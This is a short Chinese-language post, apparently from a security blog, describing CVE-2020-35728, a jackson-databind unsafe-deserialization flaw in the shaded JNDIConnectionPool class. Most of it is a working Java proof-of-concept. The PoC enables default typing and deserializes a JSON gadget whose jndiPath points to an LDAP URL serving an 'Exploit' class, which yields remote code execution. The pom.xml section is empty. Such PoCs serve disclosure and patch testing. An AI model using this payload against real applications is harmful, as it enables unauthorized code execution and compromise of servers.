# Jackson-databind RCE(CVE-2020-35728)
由于com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool组件库存在不安全的反序列化,导致攻击者可以利用漏洞实现远程代码执行。
**pom.xml:**
“`xml
“`
**poc.java**
“`java
import com.fasterxml.jackson.databind.ObjectMapper;
public class POC {
public static void main(String[] args) throws Exception {
String payload = “[\”com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\”,{\”jndiPath\”:\”ldap://127.0.0.1:1088/Exploit\”}]”;
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
Object obj = mapper.readValue(payload, Object.class);
mapper.writeValueAsString(obj);
}
}
“`

ref:
https://github.com/Al1ex/CVE-2020-35728













请登录后查看评论内容